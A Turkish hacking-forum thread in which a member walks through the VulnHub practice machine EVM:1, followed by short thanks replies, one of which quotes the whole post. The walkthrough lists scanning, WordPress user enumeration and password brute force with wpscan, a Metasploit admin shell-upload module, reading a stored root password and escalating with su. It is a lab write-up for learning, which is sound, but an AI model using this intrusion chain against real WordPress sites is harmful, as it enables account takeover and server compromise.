EVM:1 | VulnHub

P4$A · 26 Şub 2022

Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz
Makine: LİNK

Önce nmap taraması yapalım,
nmap -A -p- -T4 ip

Ve nmap taramamız bitti,

80. portumuz açık sitemize gidelim.

Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım
dirb http://ip/

Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.
wpscan --url http://ip/wordpress --enumerate u

Evet kullanıcı adımızı bulduk

Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.
wpscan --url http://ip/wordpress -U username -P wordlistiniz

Şifremizi buldu şifremiz 24992499 muş

Şimdi metasploit üzerinden shell sokmayı denicem
msfconsole -q

use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim

Daha sonra exploitimizin ayarlarını yaptıktan sonra exploit diyerek bağlantı alalım,

ls dedikten sonra root3r adında dizin var oraya giriyorum

burada root için gerekli password txt dosyası var cat komutu ile okuyorum
cat .root_password_ssh.txt

shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum

su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.

7as · 26 Şub 2022

Eline sağlık hocam

BÜRKÜT' · 26 Şub 2022

Eline sağlık

Ghost Killer · 26 Şub 2022

eline sağlık.

Bahadır-Şad · 27 Şub 2022

Eline sağlık

*Crasher · 27 Şub 2022

Eline Sağlık Hocam

glaucoma · 27 Şub 2022

P4$A' Alıntı:
Selamlar Değerli TurkHackTeam Üyeleri ;
Bugün Sizlerle VulnHub da Bulunan EVM:1 Adlı Makineyi Çözeceğiz
Makine: LİNK

Önce nmap taraması yapalım,
nmap -A -p- -T4 ip

Ve nmap taramamız bitti,

80. portumuz açık sitemize gidelim.

Bizi defoult apache sayfası karşıladı, dirb aracı ile içindeki dizinleri bulalım
dirb http://ip/

Burada /wordpress adın da bir dizin var yani bir wp dizini hemen kullanıcısını bulalım.
wpscan --url http://ip/wordpress --enumerate u

Evet kullanıcı adımızı bulduk

Şimdi ise elimizde kullanıcı adı var şifre yok brute-force saldırısı ile şifreyi elde etmeye çalışalım.
wpscan --url http://ip/wordpress -U username -P wordlistiniz

Şifremizi buldu şifremiz 24992499 muş

Şimdi metasploit üzerinden shell sokmayı denicem
msfconsole -q

use exploit/unix/webapp/wp_admin_shell_upload
diyerek exploitimizi seçelim

Daha sonra exploitimizin ayarlarını yaptıktan sonra exploit diyerek bağlantı alalım,

ls dedikten sonra root3r adında dizin var oraya giriyorum

burada root için gerekli password txt dosyası var cat komutu ile okuyorum
cat .root_password_ssh.txt

shell diyerek shell oluşturuyorum ve
python -c 'import pty;pty.spawn("/bin/bash")'
komuyla www-data kullanıcısına ulaşıyorum

su root diyerek şifremi veriyorum willy26
daha sonra whoami dediğimde root kullanıcısı olduğumu görüyorum,
son olarak root dizininde dosyayı okuyorum.

Ellerinize sağlık

🅼 🆁 🆇 · 27 Şub 2022

Eline Sağlık

GökBörü. · 18 Tem 2022

Eline sağlık

skortup · 18 Tem 2022

Elinize sağlık, görsellerinizin bazıları gözükmüyor//

P4$A · 18 Tem 2022

Konu eskidi görseller silinmiş upload edilen yerler

skortup · 18 Tem 2022

P4$A' Alıntı:
Konu eskidi görseller silinmiş upload edilen yerler

Doğrudur hocam

r3ber · 18 Tem 2022

Eline sağlık

EVM:1 | VulnHub

P4$A

Uzman üye

7as

Uzman üye

BÜRKÜT'

Basın&Medya Lider Yrd.

Ghost Killer

Özel Üye

Bahadır-Şad

Katılımcı Üye

*Crasher

Katılımcı Üye

glaucoma

Üye

🅼 🆁 🆇

Uzman üye

GökBörü.

Uzman üye

skortup

Katılımcı Üye

P4$A

Uzman üye

skortup

Katılımcı Üye

r3ber

Yeni üye

Sosyal medya sayfalarımız